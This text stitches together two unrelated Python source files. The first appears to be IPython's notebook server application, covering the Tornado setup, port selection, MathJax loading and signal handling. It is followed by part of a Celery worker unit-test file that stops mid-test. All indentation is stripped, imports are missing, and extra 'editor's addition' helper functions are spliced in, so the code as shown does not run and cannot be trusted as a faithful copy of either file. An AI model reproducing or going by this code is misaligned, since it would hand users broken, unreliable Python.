from IPython.utils import py3compat
from IPython.utils.path import filefind, get_ipython_dir
from .utils import url_path_join
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_examples = """
ipython notebook # start the notebook
ipython notebook --profile=sympy # use the sympy profile
ipython notebook --certfile=mycert.pem # use SSL/TLS certificate
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n - 5):
yield max(1, port + random.randint(-2 * n, 2 * n))
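# Hedged illustration (editor's addition, not part of the original module): a
# tiny self-check of random_ports(), wrapped in a function so that importing
# this module does not run it.  All names below are local to this sketch.
def _demo_random_ports(port=8888, n=8):
    candidates = list(random_ports(port, n))
    # The first min(5, n) candidates are strictly sequential...
    assert candidates[:5] == [port + i for i in range(5)]
    # ...and the random remainder never drops below port 1.
    assert all(p >= 1 for p in candidates[5:])
    return candidates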
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
name = 'IPython.html.' + name
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, ipython_app, kernel_manager, notebook_manager,
cluster_manager, session_manager, log, base_url,
settings_overrides, jinja_env_options):
settings = self.init_settings(
ipython_app, kernel_manager, notebook_manager, cluster_manager,
session_manager, log, base_url, settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
super(NotebookWebApplication, self).__init__(handlers, **settings)
def init_settings(self, ipython_app, kernel_manager, notebook_manager,
cluster_manager, session_manager, log, base_url,
settings_overrides, jinja_env_options=None):
# Python < 2.6.5 doesn't accept unicode keys in f(**kwargs), and
# base_url will always be unicode, which will in turn
# make the patterns unicode, and ultimately result in unicode
# keys in kwargs to handler._execute(**kwargs) in tornado.
# This enforces that base_url be ascii in that situation.
#
# Note that the URLs these patterns check against are escaped,
# and thus guaranteed to be ASCII: 'héllo' is really 'h%C3%A9llo'.
base_url = py3compat.unicode_to_str(base_url, 'ascii')
template_path = settings_overrides.get(
"template_path", os.path.join(os.path.dirname(__file__), "templates"))
jenv_opt = jinja_env_options if jinja_env_options else {}
env = Environment(loader=FileSystemLoader(template_path), **jenv_opt)
settings = dict(
# basics
log_function=log_request,
base_url=base_url,
template_path=template_path,
static_path=ipython_app.static_file_path,
static_handler_class=FileFindHandler,
static_url_prefix=url_path_join(base_url, '/static/'),
# authentication
cookie_secret=ipython_app.cookie_secret,
login_url=url_path_join(base_url, '/login'),
password=ipython_app.password,
# managers
kernel_manager=kernel_manager,
notebook_manager=notebook_manager,
cluster_manager=cluster_manager,
session_manager=session_manager,
# IPython stuff
nbextensions_path=ipython_app.nbextensions_path,
mathjax_url=ipython_app.mathjax_url,
config=ipython_app.config,
jinja2_env=env,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
# Load the (URL pattern, handler) tuples for each component.
handlers = []
handlers.extend(load_handlers('base.handlers'))
handlers.extend(load_handlers('tree.handlers'))
handlers.extend(load_handlers('auth.login'))
handlers.extend(load_handlers('auth.logout'))
handlers.extend(load_handlers('notebook.handlers'))
handlers.extend(load_handlers('nbconvert.handlers'))
handlers.extend(load_handlers('services.kernels.handlers'))
handlers.extend(load_handlers('services.notebooks.handlers'))
handlers.extend(load_handlers('services.clusters.handlers'))
handlers.extend(load_handlers('services.sessions.handlers'))
handlers.extend(load_handlers('services.nbconvert.handlers'))
# FIXME: /files/ should be handled by the Contents service when it
# exists
nbm = settings['notebook_manager']
if hasattr(nbm, 'notebook_dir'):
handlers.extend([
(r"/files/(.*)", AuthenticatedFileHandler,
{'path': nbm.notebook_dir}),
(r"/nbextensions/(.*)", FileFindHandler,
{'path': settings['nbextensions_path']}),
])
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', Template404))
return new_handlers
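# Hedged sketch (editor's addition): the pattern rewriting done in
# init_handlers() above amounts to url_path_join() applied to each handler's
# regex, e.g. '/nb/' + r"/files/(.*)" -> r"/nb/files/(.*)".  The default
# arguments here are illustrative only.
def _demo_prefix_handler(base_url=u'/nb/', handler=(r"/files/(.*)", Template404)):
    pattern = url_path_join(base_url, handler[0])
    return tuple([pattern] + list(handler[1:]))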
class NbserverListApp(BaseIPythonApplication):
description = "List currently running notebook servers in this profile."
flags = dict(
json=({'NbserverListApp': {'json': True}},
"Produce machine-readable JSON output."),
)
json = Bool(False, config=True,
help="If True, each line of output will be a JSON object with the "
"details from the server info file.")
def start(self):
if not self.json:
print("Currently running servers:")
for serverinfo in list_running_servers(self.profile):
if self.json:
print(json.dumps(serverinfo))
else:
print(serverinfo['url'], "::", serverinfo['notebook_dir'])
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(kernel_flags)
flags['no-browser'] = (
{'NotebookApp': {'open_browser': False}},
"Don't open the notebook in a browser after startup."
)
flags['no-mathjax'] = (
{'NotebookApp': {'enable_mathjax': False}},
"""Disable MathJax
MathJax is the javascript library IPython uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileNotebookManager.save_script',
'Auto-save a .py script every time the .ipynb notebook is saved',
'Do not auto-save .py scripts for every notebook'))
# the flags that are specific to the frontend
# these must be scrubbed before being passed to the kernel,
# or it will raise an error on unrecognized flags
notebook_flags = ['no-browser', 'no-mathjax', 'script', 'no-script']
aliases = dict(kernel_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'notebook-dir': 'NotebookApp.notebook_dir',
'browser': 'NotebookApp.browser',
})
# remove ipkernel flags that are singletons, and don't make sense in a
# multi-kernel environment:
aliases.pop('f', None)
notebook_aliases = [u'port', u'port-retries', u'ip', u'keyfile', u'certfile',
u'notebook-dir', u'profile', u'profile-dir']
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(BaseIPythonApplication):
name = 'ipython-notebook'
description = """
The IPython HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an
HTML5/Javascript Notebook client.
"""
examples = _examples
classes = IPythonConsoleApp.classes + [MappingKernelManager, NotebookManager,
FileNotebookManager, NotebookNotary]
flags = Dict(flags)
aliases = Dict(aliases)
subcommands = dict(
list=(NbserverListApp, NbserverListApp.description.splitlines()[0]),
)
kernel_argv = List(Unicode)
def _log_level_default(self):
return logging.INFO
def _log_format_default(self):
"""override default log format to include time"""
return u"%(asctime)s.%(msecs).03d [%(name)s]%(highlevel)s %(message)s"
# create requested profiles by default, if they don't exist:
auto_create = Bool(True)
# file to be opened in the notebook server
file_to_run = Unicode('', config=True)
def _file_to_run_changed(self, name, old, new):
path, base = os.path.split(new)
if path:
self.file_to_run = base
self.notebook_dir = path
# Network related information.
ip = Unicode(config=True,
help="The IP address the notebook server will listen on."
)
def _ip_default(self):
return localhost()
def _ip_changed(self, name, old, new):
if new == u'*':
self.ip = u''
port = Integer(8888, config=True,
help="The port the notebook server will listen on."
)
port_retries = Integer(50, config=True,
help="The number of additional ports to try if the specified port is not available."
)
certfile = Unicode(u'', config=True,
help="""The full path to an SSL/TLS certificate file."""
)
keyfile = Unicode(u'', config=True,
help="""The full path to a private key file for usage with SSL/TLS."""
)
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private; do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
def _cookie_secret_default(self):
return os.urandom(1024)
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from IPython.lib import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webapp_settings = Dict(config=True,
help="Supply overrides for the tornado.web.Application that the "
"IPython notebook uses.")
jinja_environment_options = Dict(config=True,
help="Supply extra arguments that will be passed to Jinja environment.")
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library IPython uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
def _enable_mathjax_changed(self, name, old, new):
"""set mathjax url to empty if mathjax is disabled"""
if not new:
self.mathjax_url = u''
base_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
def _base_url_changed(self, name, old, new):
if not new.startswith('/'):
self.base_url = '/' + new
elif not new.endswith('/'):
self.base_url = new + '/'
base_project_url = Unicode(
'/', config=True, help="""DEPRECATED use base_url""")
def _base_project_url_changed(self, name, old, new):
self.log.warn("base_project_url is deprecated, use base_url")
self.base_url = new
extra_static_paths = List(Unicode, config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in IPython's built-in static files."""
)
def _extra_static_paths_default(self):
return [os.path.join(self.profile_dir.location, 'static')]
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
nbextensions_path = List(Unicode, config=True,
help="""paths for Javascript extensions. By default, this is just IPYTHONDIR/nbextensions"""
)
def _nbextensions_path_default(self):
return [os.path.join(get_ipython_dir(), 'nbextensions')]
mathjax_url = Unicode("", config=True,
help="""The url for MathJax.js."""
)
def _mathjax_url_default(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.webapp_settings.get("static_url_prefix",
url_path_join(
self.base_url, "static")
)
# try local mathjax, either in nbextensions/mathjax or static/mathjax
for (url_prefix, search_path) in [
(url_path_join(self.base_url, "nbextensions"),
self.nbextensions_path),
(static_url_prefix, self.static_file_path),
]:
self.log.debug("searching for local mathjax in %s", search_path)
try:
mathjax = filefind(
os.path.join('mathjax', 'MathJax.js'), search_path)
except IOError:
continue
else:
url = url_path_join(url_prefix, u"mathjax/MathJax.js")
self.log.info(
"Serving local MathJax from %s at %s", mathjax, url)
return url
# no local mathjax, serve from CDN
if self.certfile:
# HTTPS: load from Rackspace CDN, because SSL certificate requires
# it
host = u"https://c328740.ssl.cf1.rackcdn.com"
else:
host = u"http://cdn.mathjax.org"
url = host + u"/mathjax/latest/MathJax.js"
self.log.info("Using MathJax from CDN: %s", url)
return url
def _mathjax_url_changed(self, name, old, new):
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info("Using MathJax: %s", new)
notebook_manager_class = DottedObjectName('IPython.html.services.notebooks.filenbmanager.FileNotebookManager',
config=True,
help='The notebook manager class to use.')
trust_xheaders = Bool(False, config=True,
help=("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL")
)
info_file = Unicode()
def _info_file_default(self):
info_file = "nbserver-%s.json" % os.getpid()
return os.path.join(self.profile_dir.security_dir, info_file)
notebook_dir = Unicode(py3compat.getcwd(), config=True,
help="The directory to use for notebooks and kernels."
)
def _notebook_dir_changed(self, name, old, new):
"""Do a bit of validation of the notebook dir."""
if not os.path.isabs(new):
# If we receive a non-absolute path, make it absolute.
self.notebook_dir = os.path.abspath(new)
return
if not os.path.isdir(new):
raise TraitError("No such notebook dir: %r" % new)
# setting App.notebook_dir implies setting notebook and kernel dirs as
# well
self.config.FileNotebookManager.notebook_dir = new
self.config.MappingKernelManager.root_dir = new
def parse_command_line(self, argv=None):
super(NotebookApp, self).parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical("No such file or directory: %s", f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the profile.
if os.path.isdir(f):
self.config.NotebookApp.notebook_dir = f
elif os.path.isfile(f):
self.config.NotebookApp.file_to_run = f
def init_kernel_argv(self):
"""construct the kernel arguments"""
# Scrub frontend-specific flags
self.kernel_argv = swallow_argv(
self.argv, notebook_aliases, notebook_flags)
if any(arg.startswith(u'--pylab') for arg in self.kernel_argv):
self.log.warn('\n '.join([
"Starting all kernels in pylab mode is not recommended,",
"and will be disabled in a future release.",
"Please use the %matplotlib magic to enable matplotlib instead.",
"pylab implies many imports, which can have confusing side effects",
"and harm the reproducibility of your notebooks.",
]))
# Kernel should inherit default config file from frontend
self.kernel_argv.append(
"--IPKernelApp.parent_appname='%s'" % self.name)
# Kernel should get *absolute* path to profile directory
self.kernel_argv.extend(["--profile-dir", self.profile_dir.location])
def init_configurables(self):
# force Session default to be secure
default_secure(self.config)
self.kernel_manager = MappingKernelManager(
parent=self, log=self.log, kernel_argv=self.kernel_argv,
connection_dir=self.profile_dir.security_dir,
)
kls = import_item(self.notebook_manager_class)
self.notebook_manager = kls(parent=self, log=self.log)
self.session_manager = SessionManager(parent=self, log=self.log)
self.cluster_manager = ClusterManager(parent=self, log=self.log)
self.cluster_manager.update_profiles()
def init_logging(self):
# This prevents double log messages because tornado uses a root logger that
# self.log is a child of. The logging module dispatches log messages to a logger
# and all of its ancestors until propagate is set to False.
self.log.propagate = False
# hook up tornado 3's loggers to our app handlers
for name in ('access', 'application', 'general'):
logger = logging.getLogger('tornado.%s' % name)
logger.parent = self.log
logger.setLevel(self.log.level)
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.notebook_manager,
self.cluster_manager, self.session_manager,
self.log, self.base_url, self.webapp_settings,
self.jinja_environment_options
)
if self.certfile:
ssl_options = dict(certfile=self.certfile)
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
else:
ssl_options = None
self.web_app.password = self.password
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders)
if not self.ip:
warning = "WARNING: The notebook server is listening on all IP addresses"
if ssl_options is None:
self.log.critical(warning + " and not using encryption. This "
"is not recommended.")
if not self.password:
self.log.critical(warning + " and not using authentication. "
"This is highly insecure and not recommended.")
success = None
for port in random_ports(self.port, self.port_retries + 1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(
'The port %i is already in use, trying another random port.' % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warn(
"Permission to listen on port %i denied" % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical('ERROR: the notebook server could not be started because '
'no available port could be found.')
self.exit(1)
@property
def display_url(self):
ip = self.ip if self.ip else '[all ip addresses on your system]'
return self._url(ip)
@property
def connection_url(self):
ip = self.ip if self.ip else localhost()
return self._url(ip)
def _url(self, ip):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
def init_signal(self):
if not sys.platform.startswith('win'):
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
# FIXME: remove this delay when pyzmq dependency is >= 2.1.11
time.sleep(0.1)
info = self.log.info
info('interrupted')
print(self.notebook_info())
sys.stdout.write("Shutdown this notebook server (y/[n])? ")
sys.stdout.flush()
r, w, x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith('y'):
self.log.critical("Shutdown confirmed")
ioloop.IOLoop.instance().stop()
return
else:
print("No answer for 5s:", end=' ')
print("resuming operation...")
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
ioloop.IOLoop.instance().add_callback(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical("received signal %s, stopping", sig)
ioloop.IOLoop.instance().stop()
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
status = submodule.check_submodule_status()
if status == 'missing':
self.log.warn(
"components submodule missing, running `git submodule update`")
submodule.update_submodules(submodule.ipython_parent())
elif status == 'unclean':
self.log.warn(
"components submodule unclean, you may see 404s on static/components")
self.log.warn(
"run `setup.py submodule` or `git submodule update` to update")
@catch_config_error
def initialize(self, argv=None):
super(NotebookApp, self).initialize(argv)
self.init_logging()
self.init_kernel_argv()
self.init_configurables()
self.init_components()
self.init_webapp()
self.init_signal()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
self.log.info('Shutting down kernels')
self.kernel_manager.shutdown_all()
def notebook_info(self):
"Return the current working directory and the server url information"
info = self.notebook_manager.info_string() + "\n"
info += "%d active kernels \n" % len(self.kernel_manager._kernels)
return info + "The IPython Notebook is running at: %s" % self.display_url
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'secure': bool(self.certfile),
'base_url': self.base_url,
'notebook_dir': os.path.abspath(self.notebook_dir),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def start(self):
""" Start the IPython Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
if self.subapp is not None:
return self.subapp.start()
info = self.log.info
for line in self.notebook_info().split("\n"):
info(line)
info(
"Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).")
self.write_server_info_file()
if self.open_browser or self.file_to_run:
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warn('No web browser found: %s.' % e)
browser = None
if self.file_to_run:
fullpath = os.path.join(self.notebook_dir, self.file_to_run)
if not os.path.exists(fullpath):
self.log.critical("%s does not exist" % fullpath)
self.exit(1)
uri = url_path_join('notebooks', self.file_to_run)
else:
uri = 'tree'
if browser:
b = lambda: browser.open(url_path_join(self.connection_url, uri),
new=2)
threading.Thread(target=b).start()
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
info("Interrupted...")
finally:
self.cleanup_kernels()
self.remove_server_info_file()
def list_running_servers(profile='default'):
"""Iterate over the server info files of running notebook servers.
Given a profile name, find nbserver-* files in the security directory of
that profile, and yield dicts of their information, each one pertaining to
a currently running notebook server instance.
"""
pd = ProfileDir.find_profile_dir_by_name(get_ipython_dir(), name=profile)
for file in os.listdir(pd.security_dir):
if file.startswith('nbserver-'):
with io.open(os.path.join(pd.security_dir, file), encoding='utf-8') as f:
yield json.load(f)
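# Hedged usage sketch (editor's addition): enumerate running servers for a
# profile without going through the `ipython notebook list` subcommand.  Each
# yielded dict mirrors NotebookApp.server_info().
def _demo_print_running_servers(profile='default'):
    for info in list_running_servers(profile):
        print(info['url'], '::', info['notebook_dir'])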
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
launch_new_instance = NotebookApp.launch_instance
|
test_worker.py
|
import socket
import sys
from datetime import datetime, timedelta
from Queue import Empty
from kombu.transport.base import Message
from kombu.connection import BrokerConnection
from celery.utils.timer2 import Timer
from celery import current_app
from celery.concurrency.base import BasePool
from celery.exceptions import SystemTerminate
from celery.task import task as task_dec
from celery.task import periodic_task as periodic_task_dec
from celery.utils import timer2
from celery.utils import gen_unique_id
from celery.worker import WorkController
from celery.worker.buckets import FastQueue
from celery.worker.job import TaskRequest
from celery.worker.consumer import Consumer as MainConsumer
from celery.worker.consumer import QoS, RUN, PREFETCH_COUNT_MAX
from celery.utils.serialization import pickle
from celery.tests.compat import catch_warnings
from celery.tests.utils import unittest
from celery.tests.utils import AppCase, execute_context, skip
class MockConsumer(object):
class Channel(object):
def close(self):
pass
def register_callback(self, cb):
pass
def consume(self):
pass
@property
def channel(self):
return self.Channel()
class PlaceHolder(object):
pass
class MyKombuConsumer(MainConsumer):
broadcast_consumer = MockConsumer()
task_consumer = MockConsumer()
def __init__(self, *args, **kwargs):
kwargs.setdefault("pool", BasePool(2))
super(MyKombuConsumer, self).__init__(*args, **kwargs)
def restart_heartbeat(self):
self.heart = None
class MockNode(object):
commands = []
def handle_message(self, body, message):
self.commands.append(body.pop("command", None))
class MockEventDispatcher(object):
sent = []
closed = False
flushed = False
_outbound_buffer = []
def send(self, event, *args, **kwargs):
self.sent.append(event)
def close(self):
self.closed = True
def flush(self):
self.flushed = True
class MockHeart(object):
closed = False
def stop(self):
self.closed = True
@task_dec()
def foo_task(x, y, z, **kwargs):
return x * y * z
@periodic_task_dec(run_every=60)
def foo_periodic_task():
return "foo"
class MockLogger(object):
def __init__(self):
self.logged = []
def critical(self, msg, *args, **kwargs):
self.logged.append(msg)
def info(self, msg, *args, **kwargs):
self.logged.append(msg)
def error(self, msg, *args, **kwargs):
self.logged.append(msg)
def debug(self, msg, *args, **kwargs):
self.logged.append(msg)
class MockBackend(object):
_acked = False
def basic_ack(self, delivery_tag):
self._acked = True
class MockPool(BasePool):
_terminated = False
_stopped = False
def __init__(self, *args, **kwargs):
self.raise_regular = kwargs.get("raise_regular", False)
self.raise_base = kwargs.get("raise_base", False)
self.raise_SystemTerminate = kwargs.get("raise_SystemTerminate",
False)
def apply_async(self, *args, **kwargs):
if self.raise_regular:
raise KeyError("some exception")
if self.raise_base:
raise KeyboardInterrupt("Ctrl+c")
if self.raise_SystemTerminate:
raise SystemTerminate()
def start(self):
pass
def stop(self):
self._stopped = True
return True
def terminate(self):
self._terminated = True
self.stop()
class MockController(object):
def __init__(self, w, *args, **kwargs):
self._w = w
self._stopped = False
def start(self):
self._w["started"] = True
self._stopped = False
def stop(self):
self._stopped = True
def create_message(backend, **data):
data.setdefault("id", gen_unique_id())
return Message(backend, body=pickle.dumps(dict(**data)),
content_type="application/x-python-serialize",
content_encoding="binary")
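# Hedged illustration (editor's addition): how the tests below use the helper
# above to fake an incoming task message for foo_task.
def _demo_create_message():
    backend = MockBackend()
    m = create_message(backend, task=foo_task.name, args=[2, 4, 8], kwargs={})
    # The payload round-trips through pickle, just like a real kombu message.
    body = m.decode()
    assert body["task"] == foo_task.name and body["args"] == [2, 4, 8]
    return m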
class test_QoS(unittest.TestCase):
class _QoS(QoS):
def __init__(self, value):
self.value = value
QoS.__init__(self, None, value, None)
def set(self, value):
return value
def test_qos_increment_decrement(self):
qos = self._QoS(10)
self.assertEqual(qos.increment(), 11)
self.assertEqual(qos.increment(3), 14)
self.assertEqual(qos.increment(-30), 14)
self.assertEqual(qos.decrement(7), 7)
self.assertEqual(qos.decrement(), 6)
self.assertRaises(AssertionError, qos.decrement, 10)
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
self.assertEqual(qos.increment(), 0)
self.assertEqual(qos.increment(3), 0)
self.assertEqual(qos.increment(-30), 0)
self.assertEqual(qos.decrement(7), 0)
self.assertEqual(qos.decrement(), 0)
self.assertEqual(qos.decrement(10), 0)
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in xrange(1000):
qos.increment()
def sub():
for i in xrange(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
self.assertEqual(qos.value, 2010)
qos.value = 1000
threaded([add, sub]) # n = 2
self.assertEqual(qos.value, 1000)
class MockConsumer(object):
prefetch_count = 0
def qos(self, prefetch_size=0, prefetch_count=0, apply_global=False):
self.prefetch_count = prefetch_count
def test_exceeds_short(self):
consumer = self.MockConsumer()
qos = QoS(consumer, PREFETCH_COUNT_MAX - 1,
current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX + 1)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
def test_consumer_increment_decrement(self):
consumer = self.MockConsumer()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, 10)
self.assertEqual(consumer.prefetch_count, 10)
qos.decrement()
self.assertEqual(qos.value, 9)
self.assertEqual(consumer.prefetch_count, 9)
qos.decrement_eventually()
self.assertEqual(qos.value, 8)
self.assertEqual(consumer.prefetch_count, 9)
# Does not decrement 0 value
qos.value = 0
qos.decrement()
self.assertEqual(qos.value, 0)
qos.increment()
self.assertEqual(qos.value, 0)
class test_Consumer(unittest.TestCase):
def setUp(self):
self.ready_queue = FastQueue()
self.eta_schedule = Timer()
self.logger = current_app.log.get_default_logger()
self.logger.setLevel(0)
def tearDown(self):
self.eta_schedule.stop()
def test_info(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(l.task_consumer, 10, l.logger)
info = l.info
self.assertEqual(info["prefetch_count"], 10)
self.assertFalse(info["broker"])
l.connection = current_app.broker_connection()
info = l.info
self.assertTrue(info["broker"])
def test_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l._state = RUN
l.event_dispatcher = None
l.stop_consumers(close=False)
self.assertTrue(l.connection)
l._state = RUN
l.stop_consumers()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l.stop_consumers()
l.stop()
l.close_connection()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
def test_close_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = RUN
l.close_connection()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
eventer = l.event_dispatcher = MockEventDispatcher()
heart = l.heart = MockHeart()
l._state = RUN
l.stop_consumers()
self.assertTrue(eventer.closed)
self.assertTrue(heart.closed)
def test_receive_message_unknown(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
m = create_message(backend, unknown={"baz": "!!!"})
l.event_dispatcher = MockEventDispatcher()
l.pidbox_node = MockNode()
def with_catch_warnings(log):
l.receive_message(m.decode(), m)
self.assertTrue(log)
self.assertIn("unknown message", log[0].message.args[0])
context = catch_warnings(record=True)
execute_context(context, with_catch_warnings)
def test_receive_message_eta_OverflowError(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
called = [False]
def to_timestamp(d):
called[0] = True
raise OverflowError()
m = create_message(backend, task=foo_task.name,
args=("2, 2"),
kwargs={},
eta=datetime.now().isoformat())
l.event_dispatcher = MockEventDispatcher()
l.pidbox_node = MockNode()
prev, timer2.to_timestamp = timer2.to_timestamp, to_timestamp
try:
l.receive_message(m.decode(), m)
self.assertTrue(m.acknowledged)
self.assertTrue(called[0])
finally:
timer2.to_timestamp = prev
def test_receive_message_InvalidTaskError(self):
logger = MockLogger()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
backend = MockBackend()
m = create_message(backend, task=foo_task.name,
args=(1, 2), kwargs="foobarbaz", id=1)
l.event_dispatcher = MockEventDispatcher()
l.pidbox_node = MockNode()
l.receive_message(m.decode(), m)
self.assertIn("Invalid task ignored", logger.logged[0])
def test_on_decode_error(self):
logger = MockLogger()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
class MockMessage(object):
content_type = "application/x-msgpack"
content_encoding = "binary"
body = "foobarbaz"
acked = False
def ack(self):
self.acked = True
message = MockMessage()
l.on_decode_error(message, KeyError("foo"))
self.assertTrue(message.acked)
self.assertIn("Can't decode message body", logger.logged[0])
def test_receieve_message(self):
